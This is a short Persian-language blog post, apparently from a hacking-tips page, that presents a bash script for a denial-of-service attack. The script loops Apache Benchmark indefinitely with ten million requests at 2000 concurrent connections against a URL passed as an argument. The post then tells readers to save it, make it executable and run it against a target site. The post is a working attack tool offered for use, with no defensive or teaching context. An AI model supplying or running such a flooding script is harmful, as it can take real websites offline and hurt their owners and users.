هک: اسکریپت ساده‌ای برای حمله DoS

اسکریپت زیر که از Apache benckmark برای ایجاد حمله استفاده می‌کند:

"#!/bin/bash
web=$1
while :
do
/usr/bin/ab -n10000000 -c2000 $1
STATUS=`echo $?`
if [ $STATUS -eq 0 ]
then
/usr/bin/ab -n10000000 -c2000 $1
fi
done"

برای اجرا این کد را در فایلی ذخیره کنید و دسترسی آن را به قابل اجرا تغییر دهید. سپس آن را اجرا کنید.

./dos.sh http://yourwebsite.com/
برچسب ها: 

افزودن نظر جدید